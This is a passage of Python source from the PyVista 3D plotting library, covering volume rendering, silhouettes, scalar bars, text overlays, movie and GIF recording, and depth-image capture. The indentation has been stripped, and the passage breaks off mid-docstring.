prop.SetDiffuse(diffuse)
prop.SetSpecular(specular)
prop.SetSpecularPower(specular_power)
if pbr:
if not _vtk.VTK9: # pragma: no cover
raise RuntimeError('Physically based rendering requires VTK 9 ' 'or newer')
prop.SetInterpolationToPBR()
prop.SetMetallic(metallic)
prop.SetRoughness(roughness)
elif smooth_shading:
prop.SetInterpolationToPhong()
else:
prop.SetInterpolationToFlat()
# edge display style
if show_edges:
prop.EdgeVisibilityOn()
rgb_color = Color(color, default_color=self._theme.color)
prop.SetColor(rgb_color.float_rgb)
if isinstance(opacity, (float, int)):
prop.SetOpacity(opacity)
prop.SetEdgeColor(Color(edge_color, default_color=self._theme.edge_color).float_rgb)
if render_points_as_spheres:
prop.SetRenderPointsAsSpheres(render_points_as_spheres)
if render_lines_as_tubes:
prop.SetRenderLinesAsTubes(render_lines_as_tubes)
# legend label
if label:
if not isinstance(label, str):
raise TypeError('Label must be a string')
geom = pyvista.Triangle()
if scalars is not None:
geom = pyvista.Box()
rgb_color = Color('black')
geom.points -= geom.center
addr = actor.GetAddressAsString("")
self.renderer._labels[addr] = [geom, label, rgb_color]
# lighting display style
if not lighting:
prop.LightingOff()
# set line thickness
if line_width:
prop.SetLineWidth(line_width)
self.add_actor(
actor,
reset_camera=reset_camera,
name=name,
culling=culling,
pickable=pickable,
render=render,
)
# hide scalar bar if using special scalars
if scalar_bar_args.get('title') == '__custom_rgba':
show_scalar_bar = False
# Only show scalar bar if there are scalars
if show_scalar_bar and scalars is not None:
self.add_scalar_bar(**scalar_bar_args)
self.renderer.Modified()
return actor
def add_volume(
self,
volume,
scalars=None,
clim=None,
resolution=None,
opacity='linear',
n_colors=256,
cmap=None,
flip_scalars=False,
reset_camera=None,
name=None,
ambient=0.0,
categories=False,
culling=False,
multi_colors=False,
blending='composite',
mapper=None,
scalar_bar_args=None,
show_scalar_bar=None,
annotations=None,
pickable=True,
preference="point",
opacity_unit_distance=None,
shade=False,
diffuse=0.7,
specular=0.2,
specular_power=10.0,
render=True,
**kwargs,
):
"""Add a volume, rendered using a smart mapper by default.
Requires a 3D :class:`numpy.ndarray` or :class:`pyvista.UniformGrid`.
Parameters
----------
volume : 3D numpy.ndarray or pyvista.UniformGrid
The input volume to visualize. 3D numpy arrays are accepted.
scalars : str or numpy.ndarray, optional
Scalars used to "color" the mesh. Accepts a string name of an
array that is present on the mesh or an array equal
to the number of cells or the number of points in the
mesh. Array should be sized as a single vector. If ``scalars`` is
``None``, then the active scalars are used.
clim : 2 item list, optional
Color bar range for scalars. Defaults to minimum and
maximum of scalars array. Example: ``[-1, 2]``. ``rng``
is also an accepted alias for this.
resolution : list, optional
Block resolution.
opacity : str or numpy.ndarray, optional
Opacity mapping for the scalars array.
A string can also be specified to map the scalars range to a
predefined opacity transfer function (options include: 'linear',
'linear_r', 'geom', 'geom_r'). Or you can pass a custom made
transfer function that is an array either ``n_colors`` in length or
shorter.
n_colors : int, optional
Number of colors to use when displaying scalars. Defaults to 256.
The scalar bar will also have this many colors.
cmap : str, optional
Name of the Matplotlib colormap to us when mapping the ``scalars``.
See available Matplotlib colormaps. Only applicable for when
displaying ``scalars``. Requires Matplotlib to be installed.
``colormap`` is also an accepted alias for this. If ``colorcet`` or
``cmocean`` are installed, their colormaps can be specified by name.
flip_scalars : bool, optional
Flip direction of cmap. Most colormaps allow ``*_r`` suffix to do
this as well.
reset_camera : bool, optional
Reset the camera after adding this mesh to the scene.
name : str, optional
The name for the added actor so that it can be easily
updated. If an actor of this name already exists in the
rendering window, it will be replaced by the new actor.
ambient : float, optional
When lighting is enabled, this is the amount of light from
0 to 1 that reaches the actor when not directed at the
light source emitted from the viewer. Default 0.0.
categories : bool, optional
If set to ``True``, then the number of unique values in the scalar
array will be used as the ``n_colors`` argument.
culling : str, optional
Does not render faces that are culled. Options are ``'front'`` or
``'back'``. This can be helpful for dense surface meshes,
especially when edges are visible, but can cause flat
meshes to be partially displayed. Defaults ``False``.
multi_colors : bool, optional
Whether or not to use multiple colors when plotting MultiBlock
object. Blocks will be colored sequentially as 'Reds', 'Greens',
'Blues', and 'Grays'.
blending : str, optional
Blending mode for visualisation of the input object(s). Can be
one of 'additive', 'maximum', 'minimum', 'composite', or
'average'. Defaults to 'additive'.
mapper : str, optional
Volume mapper to use given by name. Options include:
``'fixed_point'``, ``'gpu'``, ``'open_gl'``, and
``'smart'``. If ``None`` the ``"volume_mapper"`` in the
``self._theme`` is used.
scalar_bar_args : dict, optional
Dictionary of keyword arguments to pass when adding the
scalar bar to the scene. For options, see
:func:`pyvista.BasePlotter.add_scalar_bar`.
show_scalar_bar : bool
If ``False``, a scalar bar will not be added to the
scene. Defaults to ``True``.
annotations : dict, optional
Pass a dictionary of annotations. Keys are the float
values in the scalars range to annotate on the scalar bar
and the values are the the string annotations.
pickable : bool, optional
Set whether this mesh is pickable.
preference : str, optional
When ``mesh.n_points == mesh.n_cells`` and setting
scalars, this parameter sets how the scalars will be
mapped to the mesh. Default ``'points'``, causes the
scalars will be associated with the mesh points. Can be
either ``'points'`` or ``'cells'``.
opacity_unit_distance : float
Set/Get the unit distance on which the scalar opacity
transfer function is defined. Meaning that over that
distance, a given opacity (from the transfer function) is
accumulated. This is adjusted for the actual sampling
distance during rendering. By default, this is the length
of the diagonal of the bounding box of the volume divided
by the dimensions.
shade : bool
Default off. If shading is turned on, the mapper may
perform shading calculations - in some cases shading does
not apply (for example, in a maximum intensity projection)
and therefore shading will not be performed even if this
flag is on.
diffuse : float, optional
The diffuse lighting coefficient. Default ``1.0``.
specular : float, optional
The specular lighting coefficient. Default ``0.0``.
specular_power : float, optional
The specular power. Between ``0.0`` and ``128.0``.
render : bool, optional
Force a render when True. Default ``True``.
**kwargs : dict, optional
Optional keyword arguments.
Returns
-------
vtk.vtkActor
VTK actor of the volume.
Examples
--------
Show a built-in volume example with the coolwarm colormap.
>>> from pyvista import examples
>>> import pyvista as pv
>>> bolt_nut = examples.download_bolt_nut()
>>> pl = pv.Plotter()
>>> _ = pl.add_volume(bolt_nut, cmap="coolwarm")
>>> pl.show()
"""
# Handle default arguments
# Supported aliases
clim = kwargs.pop('rng', clim)
cmap = kwargs.pop('colormap', cmap)
culling = kwargs.pop("backface_culling", culling)
if "scalar" in kwargs:
raise TypeError(
"`scalar` is an invalid keyword argument for `add_mesh`. Perhaps you mean `scalars` with an s?"
)
assert_empty_kwargs(**kwargs)
# Avoid mutating input
if scalar_bar_args is None:
scalar_bar_args = {}
else:
scalar_bar_args = scalar_bar_args.copy()
# account for legacy behavior
if 'stitle' in kwargs: # pragma: no cover
warnings.warn(USE_SCALAR_BAR_ARGS, PyvistaDeprecationWarning)
scalar_bar_args.setdefault('title', kwargs.pop('stitle'))
if show_scalar_bar is None:
show_scalar_bar = self._theme.show_scalar_bar
if culling is True:
culling = 'backface'
if mapper is None:
mapper = self._theme.volume_mapper
# only render when the plotter has already been shown
if render is None:
render = not self._first_time
# Convert the VTK data object to a pyvista wrapped object if necessary
if not is_pyvista_dataset(volume):
if isinstance(volume, np.ndarray):
volume = wrap(volume)
if resolution is None:
resolution = [1, 1, 1]
elif len(resolution) != 3:
raise ValueError('Invalid resolution dimensions.')
volume.spacing = resolution
else:
volume = wrap(volume)
if not is_pyvista_dataset(volume):
raise TypeError(
f'Object type ({type(volume)}) not supported for plotting in PyVista.'
)
else:
# HACK: Make a copy so the original object is not altered.
# Also, place all data on the nodes as issues arise when
# volume rendering on the cells.
volume = volume.cell_data_to_point_data()
if name is None:
name = f'{type(volume).__name__}({volume.memory_address})'
if isinstance(volume, pyvista.MultiBlock):
from itertools import cycle
cycler = cycle(['Reds', 'Greens', 'Blues', 'Greys', 'Oranges', 'Purples'])
# Now iteratively plot each element of the multiblock dataset
actors = []
for idx in range(volume.GetNumberOfBlocks()):
if volume[idx] is None:
continue
# Get a good name to use
next_name = f'{name}-{idx}'
# Get the data object
block = wrap(volume.GetBlock(idx))
if resolution is None:
try:
block_resolution = block.GetSpacing()
except AttributeError:
block_resolution = resolution
else:
block_resolution = resolution
if multi_colors:
color = next(cycler)
else:
color = cmap
a = self.add_volume(
block,
resolution=block_resolution,
opacity=opacity,
n_colors=n_colors,
cmap=color,
flip_scalars=flip_scalars,
reset_camera=reset_camera,
name=next_name,
ambient=ambient,
categories=categories,
culling=culling,
clim=clim,
mapper=mapper,
pickable=pickable,
opacity_unit_distance=opacity_unit_distance,
shade=shade,
diffuse=diffuse,
specular=specular,
specular_power=specular_power,
render=render,
)
actors.append(a)
return actors
if not isinstance(volume, pyvista.UniformGrid):
raise TypeError(
f'Type {type(volume)} not supported for volume rendering at this time. Use `pyvista.UniformGrid`.'
)
if opacity_unit_distance is None:
opacity_unit_distance = volume.length / (np.mean(volume.dimensions) - 1)
if scalars is None:
# Make sure scalars components are not vectors/tuples
scalars = volume.active_scalars
# Don't allow plotting of string arrays by default
if scalars is not None and np.issubdtype(scalars.dtype, np.number):
scalar_bar_args.setdefault('title', volume.active_scalars_info[1])
else:
raise ValueError('No scalars to use for volume rendering.')
elif isinstance(scalars, str):
pass
##############
title = 'Data'
if isinstance(scalars, str):
title = scalars
scalars = get_array(volume, scalars, preference=preference, err=True)
scalar_bar_args.setdefault('title', title)
if not isinstance(scalars, np.ndarray):
scalars = np.asarray(scalars)
if not np.issubdtype(scalars.dtype, np.number):
raise TypeError('Non-numeric scalars are currently not supported for volume rendering.')
if scalars.ndim != 1:
scalars = scalars.ravel()
if scalars.dtype == np.bool_ or scalars.dtype == np.uint8:
scalars = scalars.astype(np.float_)
# Define mapper, volume, and add the correct properties
mappers = {
'fixed_point': _vtk.vtkFixedPointVolumeRayCastMapper,
'gpu': _vtk.vtkGPUVolumeRayCastMapper,
'open_gl': _vtk.vtkOpenGLGPUVolumeRayCastMapper,
'smart': _vtk.vtkSmartVolumeMapper,
}
if not isinstance(mapper, str) or mapper not in mappers.keys():
raise TypeError(
f"Mapper ({mapper}) unknown. Available volume mappers include: {', '.join(mappers.keys())}"
)
self.mapper = make_mapper(mappers[mapper])
# Scalars interpolation approach
if scalars.shape[0] == volume.n_points:
volume.point_data.set_array(scalars, title, True)
self.mapper.SetScalarModeToUsePointData()
elif scalars.shape[0] == volume.n_cells:
volume.cell_data.set_array(scalars, title, True)
self.mapper.SetScalarModeToUseCellData()
else:
raise_not_matching(scalars, volume)
# Set scalars range
if clim is None:
clim = [np.nanmin(scalars), np.nanmax(scalars)]
elif isinstance(clim, float) or isinstance(clim, int):
clim = [-clim, clim]
###############
scalars = scalars.astype(np.float_)
with np.errstate(invalid='ignore'):
idxs0 = scalars < clim[0]
idxs1 = scalars > clim[1]
scalars[idxs0] = clim[0]
scalars[idxs1] = clim[1]
scalars = ((scalars - np.nanmin(scalars)) / (np.nanmax(scalars) - np.nanmin(scalars))) * 255
# scalars = scalars.astype(np.uint8)
volume[title] = scalars
self.mapper.scalar_range = clim
# Set colormap and build lookup table
table = _vtk.vtkLookupTable()
# table.SetNanColor(nan_color) # NaN's are chopped out with current implementation
# above/below colors not supported with volume rendering
if isinstance(annotations, dict):
for val, anno in annotations.items():
table.SetAnnotation(float(val), str(anno))
if cmap is None: # Set default map if matplotlib is available
if _has_matplotlib():
cmap = self._theme.cmap
if cmap is not None:
if not _has_matplotlib():
raise ImportError('Please install matplotlib for volume rendering.')
cmap = get_cmap_safe(cmap)
if categories:
if categories is True:
n_colors = len(np.unique(scalars))
elif isinstance(categories, int):
n_colors = categories
if flip_scalars:
cmap = cmap.reversed()
color_tf = _vtk.vtkColorTransferFunction()
for ii in range(n_colors):
color_tf.AddRGBPoint(ii, *cmap(ii)[:-1])
# Set opacities
if isinstance(opacity, (float, int)):
opacity_values = [opacity] * n_colors
elif isinstance(opacity, str):
opacity_values = pyvista.opacity_transfer_function(opacity, n_colors)
elif isinstance(opacity, (np.ndarray, list, tuple)):
opacity = np.array(opacity)
opacity_values = opacity_transfer_function(opacity, n_colors)
opacity_tf = _vtk.vtkPiecewiseFunction()
for ii in range(n_colors):
opacity_tf.AddPoint(ii, opacity_values[ii] / n_colors)
# Now put color tf and opacity tf into a lookup table for the scalar bar
table.SetNumberOfTableValues(n_colors)
lut = cmap(np.array(range(n_colors))) * 255
lut[:, 3] = opacity_values
lut = lut.astype(np.uint8)
table.SetTable(_vtk.numpy_to_vtk(lut))
table.SetRange(*clim)
self.mapper.lookup_table = table
self.mapper.SetInputData(volume)
blending = blending.lower()
if blending in ['additive', 'add', 'sum']:
self.mapper.SetBlendModeToAdditive()
elif blending in ['average', 'avg', 'average_intensity']:
self.mapper.SetBlendModeToAverageIntensity()
elif blending in ['composite', 'comp']:
self.mapper.SetBlendModeToComposite()
elif blending in ['maximum', 'max', 'maximum_intensity']:
self.mapper.SetBlendModeToMaximumIntensity()
elif blending in ['minimum', 'min', 'minimum_intensity']:
self.mapper.SetBlendModeToMinimumIntensity()
else:
raise ValueError(
f'Blending mode {blending!r} invalid. '
'Please choose one of "additive", '
'"composite", "minimum" or "maximum".'
)
self.mapper.Update()
self.volume = _vtk.vtkVolume()
self.volume.SetMapper(self.mapper)
prop = _vtk.vtkVolumeProperty()
prop.SetColor(color_tf)
prop.SetScalarOpacity(opacity_tf)
prop.SetAmbient(ambient)
prop.SetScalarOpacityUnitDistance(opacity_unit_distance)
prop.SetShade(shade)
prop.SetDiffuse(diffuse)
prop.SetSpecular(specular)
prop.SetSpecularPower(specular_power)
self.volume.SetProperty(prop)
actor, prop = self.add_actor(
self.volume,
reset_camera=reset_camera,
name=name,
culling=culling,
pickable=pickable,
render=render,
)
# Add scalar bar if scalars are available
if show_scalar_bar and scalars is not None:
self.add_scalar_bar(**scalar_bar_args)
self.renderer.Modified()
return actor
def add_silhouette(self, mesh, params=None):
"""Add a silhouette of a PyVista or VTK dataset to the scene.
A silhouette can also be generated directly in
:func:`add_mesh <pyvista.Plotter.add_mesh>`. See also
:ref:`silhouette_example`.
Parameters
----------
mesh : pyvista.PolyData
Mesh for generating silhouette to plot.
params : dict, optional
* If not supplied, the default theme values will be used.
* ``color``: ``color_like``, color of the silhouette
* ``line_width``: ``float``, edge width
* ``opacity``: ``float`` between 0 and 1, edge transparency
* ``feature_angle``: If a ``float``, display sharp edges
exceeding that angle in degrees.
* ``decimate``: ``float`` between 0 and 1, level of decimation
Returns
-------
vtk.vtkActor
VTK actor of the silhouette.
Examples
--------
>>> import pyvista
>>> from pyvista import examples
>>> bunny = examples.download_bunny()
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(bunny, color='tan')
>>> _ = plotter.add_silhouette(bunny,
... params={'color': 'red', 'line_width': 8.0})
>>> plotter.view_xy()
>>> plotter.show()
"""
silhouette_params = self._theme.silhouette.to_dict()
if params:
silhouette_params.update(params)
if not is_pyvista_dataset(mesh):
mesh = wrap(mesh)
if not isinstance(mesh, pyvista.PolyData):
raise TypeError(f"Expected type is `PolyData` but {type(mesh)} was given.")
if isinstance(silhouette_params["decimate"], float):
silhouette_mesh = mesh.decimate(silhouette_params["decimate"])
else:
silhouette_mesh = mesh
alg = _vtk.vtkPolyDataSilhouette()
alg.SetInputData(silhouette_mesh)
alg.SetCamera(self.renderer.camera)
if silhouette_params["feature_angle"] is not None:
alg.SetEnableFeatureAngle(True)
alg.SetFeatureAngle(silhouette_params["feature_angle"])
else:
alg.SetEnableFeatureAngle(False)
mapper = make_mapper(_vtk.vtkDataSetMapper)
mapper.SetInputConnection(alg.GetOutputPort())
actor, prop = self.add_actor(mapper)
prop.SetColor(Color(silhouette_params["color"]).float_rgb)
prop.SetOpacity(silhouette_params["opacity"])
prop.SetLineWidth(silhouette_params["line_width"])
return actor
def update_scalar_bar_range(self, clim, name=None):
"""Update the value range of the active or named scalar bar.
Parameters
----------
clim : sequence
The new range of scalar bar. Two item list (e.g. ``[-1, 2]``).
name : str, optional
The title of the scalar bar to update.
"""
if isinstance(clim, float) or isinstance(clim, int):
clim = [-clim, clim]
if len(clim) != 2:
raise TypeError('clim argument must be a length 2 iterable of values: (min, max).')
if name is None:
if not hasattr(self, 'mapper'):
raise AttributeError('This plotter does not have an active mapper.')
self.mapper.scalar_range = clim
return
# Use the name to find the desired actor
def update_mapper(mapper_helper):
mapper_helper.scalar_range = clim
return
try:
for mh in self._scalar_bar_mappers[name]:
update_mapper(mh)
except KeyError:
raise KeyError('Name ({}) not valid/not found in this plotter.')
return
def clear(self):
"""Clear plot by removing all actors and properties.
Examples
--------
>>> import pyvista
>>> plotter = pyvista.Plotter()
>>> actor = plotter.add_mesh(pyvista.Sphere())
>>> plotter.clear()
>>> plotter.renderer.actors
{}
"""
self.renderers.clear()
self.scalar_bars.clear()
self.mesh = None
def link_views(self, views=0):
"""Link the views' cameras.
Parameters
----------
views : int | tuple or list
If ``views`` is int, link the views to the given view
index or if ``views`` is a tuple or a list, link the given
views cameras.
"""
if isinstance(views, (int, np.integer)):
for renderer in self.renderers:
renderer.camera = self.renderers[views].camera
return
views = np.asarray(views)
if np.issubdtype(views.dtype, np.integer):
for view_index in views:
self.renderers[view_index].camera = self.renderers[views[0]].camera
else:
raise TypeError(f'Expected type is int, list or tuple: {type(views)} is given')
def unlink_views(self, views=None):
"""Unlink the views' cameras.
Parameters
----------
views : None, int, tuple or list
If ``views`` is None unlink all the views, if ``views``
is int unlink the selected view's camera or if ``views``
is a tuple or a list, unlink the given views cameras.
"""
if views is None:
for renderer in self.renderers:
renderer.camera = Camera()
renderer.reset_camera()
elif isinstance(views, int):
self.renderers[views].camera = Camera()
self.renderers[views].reset_camera()
elif isinstance(views, collections.abc.Iterable):
for view_index in views:
self.renderers[view_index].camera = Camera()
self.renderers[view_index].reset_camera()
else:
raise TypeError(f'Expected type is None, int, list or tuple: {type(views)} is given')
@wraps(ScalarBars.add_scalar_bar)
def add_scalar_bar(self, *args, **kwargs):
"""Wrap for ``ScalarBars.add_scalar_bar``."""
# only render when the plotter has already been shown
render = kwargs.get('render', None)
if render is None:
kwargs['render'] = not self._first_time
# check if maper exists
mapper = kwargs.get('mapper', None)
if mapper is None:
if not hasattr(self, 'mapper') or self.mapper is None:
raise AttributeError('Mapper does not exist. Add a mesh with scalars first.')
kwargs['mapper'] = self.mapper
# title can be the first and only arg
if len(args):
title = args[0]
else:
title = kwargs.get('title', '')
if title is None:
title = ''
kwargs['title'] = title
interactive = kwargs.get('interactive', None)
if interactive is None:
interactive = self._theme.interactive
if self.shape != (1, 1):
interactive = False
elif interactive and self.shape != (1, 1):
raise ValueError('Interactive scalar bars disabled for multi-renderer plots')
# by default, use the plotter local theme
kwargs.setdefault('theme', self._theme)
return self.scalar_bars.add_scalar_bar(**kwargs)
def update_scalars(self, scalars, mesh=None, render=True):
"""Update scalars of an object in the plotter.
Parameters
----------
scalars : np.ndarray
Scalars to replace existing scalars.
mesh : vtk.PolyData or vtk.UnstructuredGrid, optional
Object that has already been added to the Plotter. If
None, uses last added mesh.
render : bool, optional
Force a render when True. Default ``True``.
"""
if mesh is None:
mesh = self.mesh
if isinstance(mesh, (collections.abc.Iterable, pyvista.MultiBlock)):
# Recursive if need to update scalars on many meshes
for m in mesh:
self.update_scalars(scalars, mesh=m, render=False)
if render:
self.render()
return
if isinstance(scalars, str):
# Grab scalars array if name given
scalars = get_array(mesh, scalars)
if scalars is None:
if render:
self.render()
return
if scalars.shape[0] == mesh.GetNumberOfPoints():
data = mesh.GetPointData()
elif scalars.shape[0] == mesh.GetNumberOfCells():
data = mesh.GetCellData()
else:
raise_not_matching(scalars, mesh)
vtk_scalars = data.GetScalars()
if vtk_scalars is None:
raise ValueError('No active scalars')
s = convert_array(vtk_scalars)
s[:] = scalars
data.Modified()
try:
# Why are the points updated here? Not all datasets have points
# and only the scalars array is modified by this function...
mesh.GetPoints().Modified()
except:
pass
if render:
self.render()
def update_coordinates(self, points, mesh=None, render=True):
"""Update the points of an object in the plotter.
Parameters
----------
points : np.ndarray
Points to replace existing points.
mesh : vtk.PolyData or vtk.UnstructuredGrid, optional
Object that has already been added to the Plotter. If
None, uses last added mesh.
render : bool, optional
Force a render when True. Default ``True``.
"""
if mesh is None:
mesh = self.mesh
mesh.points = points
# only render when the plotter has already been shown
if render is None:
render = not self._first_time
if render:
self.render()
def _clear_ren_win(self):
"""Clear the render window."""
if hasattr(self, 'ren_win'):
self.ren_win.Finalize()
del self.ren_win
def close(self, render=False):
"""Close the render window.
Parameters
----------
render : bool
Unused argument.
"""
# optionally run just prior to exiting the plotter
if self._before_close_callback is not None:
self._before_close_callback(self)
self._before_close_callback = None
# must close out widgets first
super().close()
# Renderer has an axes widget, so close it
self.renderers.close()
self.renderers.remove_all_lights()
# Grab screenshots of last render
if self._store_image:
self.last_image = self.screenshot(None, return_img=True)
self.last_image_depth = self.get_image_depth()
# reset scalar bars
self.clear()
# grab the display id before clearing the window
# this is an experimental feature
if KILL_DISPLAY: # pragma: no cover
disp_id = None
if hasattr(self, 'ren_win'):
disp_id = self.ren_win.GetGenericDisplayId()
self._clear_ren_win()
if self.iren is not None:
self.iren.remove_observers()
self.iren.terminate_app()
if KILL_DISPLAY: # pragma: no cover
_kill_display(disp_id)
self.iren = None
if hasattr(self, 'textActor'):
del self.textActor
# end movie
if hasattr(self, 'mwriter'):
try:
self.mwriter.close()
except BaseException:
pass
# this helps managing closed plotters
self._closed = True
def deep_clean(self):
"""Clean the plotter of the memory."""
if hasattr(self, 'renderers'):
self.renderers.deep_clean()
if getattr(self, 'mesh', None) is not None:
self.mesh.point_data = None
self.mesh.cell_data = None
self.mesh = None
if getattr(self, 'mapper', None) is not None:
self.mapper.lookup_table = None
self.mapper = None
self.volume = None
self.textActor = None
def add_text(
self,
text,
position='upper_left',
font_size=18,
color=None,
font=None,
shadow=False,
name=None,
viewport=False,
*,
render=True,
):
"""Add text to plot object in the top left corner by default.
Parameters
----------
text : str
The text to add the rendering.
position : str, tuple(float), optional
Position to place the bottom left corner of the text box.
If tuple is used, the position of the text uses the pixel
coordinate system (default). In this case,
it returns a more general `vtkOpenGLTextActor`.
If string name is used, it returns a `vtkCornerAnnotation`
object normally used for fixed labels (like title or xlabel).
Default is to find the top left corner of the rendering window
and place text box up there. Available position: ``'lower_left'``,
``'lower_right'``, ``'upper_left'``, ``'upper_right'``,
``'lower_edge'``, ``'upper_edge'``, ``'right_edge'``, and
``'left_edge'``.
font_size : float, optional
Sets the size of the title font. Defaults to 18.
color : color_like, optional
Either a string, RGB list, or hex color string. For example:
* ``color='white'``
* ``color='w'``
* ``color=[1.0, 1.0, 1.0]``
* ``color='#FFFFFF'``
Defaults to :attr:`pyvista.global_theme.font.color <pyvista.themes._Font.color>`.
font : str, optional
Font name may be ``'courier'``, ``'times'``, or ``'arial'``.
shadow : bool, optional
Adds a black shadow to the text. Defaults to ``False``.
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
viewport : bool, optional
If ``True`` and position is a tuple of float, uses the
normalized viewport coordinate system (values between 0.0
and 1.0 and support for HiDPI).
render : bool, optional
Force a render when ``True`` (default).
Returns
-------
vtk.vtkTextActor
Text actor added to plot.
Examples
--------
>>> import pyvista
>>> pl = pyvista.Plotter()
>>> actor = pl.add_text('Sample Text', position='upper_right', color='blue',
... shadow=True, font_size=26)
>>> pl.show()
"""
if font is None:
font = self._theme.font.family
if font_size is None:
font_size = self._theme.font.size
if position is None:
# Set the position of the text to the top left corner
window_size = self.window_size
x = (window_size[0] * 0.02) / self.shape[0]
y = (window_size[1] * 0.85) / self.shape[0]
position = [x, y]
corner_mappings = {
'lower_left': _vtk.vtkCornerAnnotation.LowerLeft,
'lower_right': _vtk.vtkCornerAnnotation.LowerRight,
'upper_left': _vtk.vtkCornerAnnotation.UpperLeft,
'upper_right': _vtk.vtkCornerAnnotation.UpperRight,
'lower_edge': _vtk.vtkCornerAnnotation.LowerEdge,
'upper_edge': _vtk.vtkCornerAnnotation.UpperEdge,
'left_edge': _vtk.vtkCornerAnnotation.LeftEdge,
'right_edge': _vtk.vtkCornerAnnotation.RightEdge,
}
corner_mappings['ll'] = corner_mappings['lower_left']
corner_mappings['lr'] = corner_mappings['lower_right']
corner_mappings['ul'] = corner_mappings['upper_left']
corner_mappings['ur'] = corner_mappings['upper_right']
corner_mappings['top'] = corner_mappings['upper_edge']
corner_mappings['bottom'] = corner_mappings['lower_edge']
corner_mappings['right'] = corner_mappings['right_edge']
corner_mappings['r'] = corner_mappings['right_edge']
corner_mappings['left'] = corner_mappings['left_edge']
corner_mappings['l'] = corner_mappings['left_edge']
if isinstance(position, (int, str, bool)):
if isinstance(position, str):
position = corner_mappings[position]
elif position is True:
position = corner_mappings['upper_left']
self.textActor = _vtk.vtkCornerAnnotation()
# This is how you set the font size with this actor
self.textActor.SetLinearFontScaleFactor(font_size // 2)
self.textActor.SetText(position, text)
else:
self.textActor = _vtk.vtkTextActor()
self.textActor.SetInput(text)
self.textActor.SetPosition(position)
if viewport:
self.textActor.GetActualPositionCoordinate().SetCoordinateSystemToNormalizedViewport()
self.textActor.GetActualPosition2Coordinate().SetCoordinateSystemToNormalizedViewport()
self.textActor.GetTextProperty().SetFontSize(int(font_size * 2))
self.textActor.GetTextProperty().SetColor(
Color(color, default_color=self._theme.font.color).float_rgb
)
self.textActor.GetTextProperty().SetFontFamily(FONTS[font].value)
self.textActor.GetTextProperty().SetShadow(shadow)
self.add_actor(self.textActor, reset_camera=False, name=name, pickable=False, render=render)
return self.textActor
def open_movie(self, filename, framerate=24, quality=5, **kwargs):
"""Establish a connection to the ffmpeg writer.
Parameters
----------
filename : str
Filename of the movie to open. Filename should end in mp4,
but other filetypes may be supported. See ``imagio.get_writer``.
framerate : int, optional
Frames per second.
quality : int, optional
Quality 10 is the top possible quality for any codec. The
range is ``0 - 10``. Higher quality leads to a larger file.
**kwargs : dict, optional
See the documentation for ``imageio.get_writer`` for additional kwargs.
Notes
-----
See the documentation for `imageio.get_writer
<https://imageio.readthedocs.io/en/stable/userapi.html#imageio.get_writer>`_
Examples
--------
Open a MP4 movie and set the quality to maximum.
>>> import pyvista
>>> pl = pyvista.Plotter
>>> pl.open_movie('movie.mp4', quality=10) # doctest:+SKIP
"""
from imageio import get_writer
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
self.mwriter = get_writer(filename, fps=framerate, quality=quality, **kwargs)
def open_gif(self, filename):
"""Open a gif file.
Parameters
----------
filename : str
Filename of the gif to open. Filename must end in ``"gif"``.
Examples
--------
Open a gif file.
>>> import pyvista
>>> pl = pyvista.Plotter
>>> pl.open_gif('movie.gif') # doctest:+SKIP
"""
from imageio import get_writer
if filename[-3:] != 'gif':
raise ValueError('Unsupported filetype. Must end in .gif')
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
self._gif_filename = os.path.abspath(filename)
self.mwriter = get_writer(filename, mode='I')
def write_frame(self):
"""Write a single frame to the movie file.
Examples
--------
>>> import pyvista
>>> plotter = pyvista.Plotter()
>>> plotter.open_movie(filename) # doctest:+SKIP
>>> plotter.add_mesh(pyvista.Sphere()) # doctest:+SKIP
>>> plotter.write_frame() # doctest:+SKIP
See :ref:`movie_example` for a full example using this method.
"""
# if off screen, show has not been called and we must render
# before extracting an image
if self._first_time:
self._on_first_render_request()
self.render()
if not hasattr(self, 'mwriter'):
raise RuntimeError('This plotter has not opened a movie or GIF file.')
self.update()
self.mwriter.append_data(self.image)
def _run_image_filter(self, ifilter):
# Update filter and grab pixels
ifilter.Modified()
ifilter.Update()
image = pyvista.wrap(ifilter.GetOutput())
img_size = image.dimensions
img_array = pyvista.utilities.point_array(image, 'ImageScalars')
# Reshape and write
tgt_size = (img_size[1], img_size[0], -1)
return img_array.reshape(tgt_size)[::-1]
def get_image_depth(self, fill_value=np.nan, reset_camera_clipping_range=True):
"""Return a depth image representing current render window.
Parameters
----------
fill_value : float, optional
Fill value for points in image that do not include objects
in scene. To not use a fill value, pass ``None``.
reset_camera_clipping_range : bool, optional
Reset the camera clipping range to include data in view.
Returns
-------
numpy.ndarray
Image of depth values from camera orthogonal to image
plane.
Notes
-----
Values in image_depth are negative to adhere to a
right-handed coordinate system.
Examples
--------
>>> import pyvista
>>> plotter = pyvista.Plotter()
>>> actor = plotter.add_mesh(pyvista.Sphere())
>>> plotter.store_image = True
>>> plotter.show()
>>> zval = plotter.get_image_depth()
"""
# allow no render window
if not hasattr(self, 'ren_win') and self.last_image_depth is not None:
zval = self.last_image_depth.copy()
if fill_value is not None:
zval[self._image_depth_null] = fill_value
return zval
self._check_rendered()
self._check_has_ren_win()
# Ensure points in view are within clipping range of renderer?
if reset_camera_clipping_range:
self.renderer.ResetCameraClippingRange()
# Get the z-buffer image
ifilter = _vtk.vtkWindowToImageFilter()
ifilter.SetInput(self.ren_win)
ifilter.ReadFrontBufferOff()
ifilter.SetInputBufferTypeToZBuffer()
zbuff = self._run_image_filter(ifilter)[:, :, 0]
# Convert z-buffer values to depth from camera
with warnings.catch_warnings():
warnings.filterwarnings('ignore')
near, far = self.camera.clipping_range
if self.camera.parallel_projection:
zval = (zbuff - near) / (far - near)
else:
zval = 2 * near * far / ((zbuff - 0.5) * 2 * (far - near) - near - far)
# Consider image values outside clipping range as nans
self._image_depth_null = np.logical_or(zval < -far, np.isclose(zval, -far))
if fill_value is not None:
zval[self._image_depth_null] = fill_value
return zval
def add_lines(self, lines, color='w', width=5, label=None, name=None):
"""Add lines to the plotting object.
Parameters
----------
lines : np.ndarray or pyvista.PolyData
Points representing line segments. For example, two line
segments would be represented as ``np.array([[0, 0, 0],
[1, 0, 0], [1, 0, 0], [1, 1, 0]])``.
color : color_like, optional
Either a string, rgb list, or hex color string. For example:
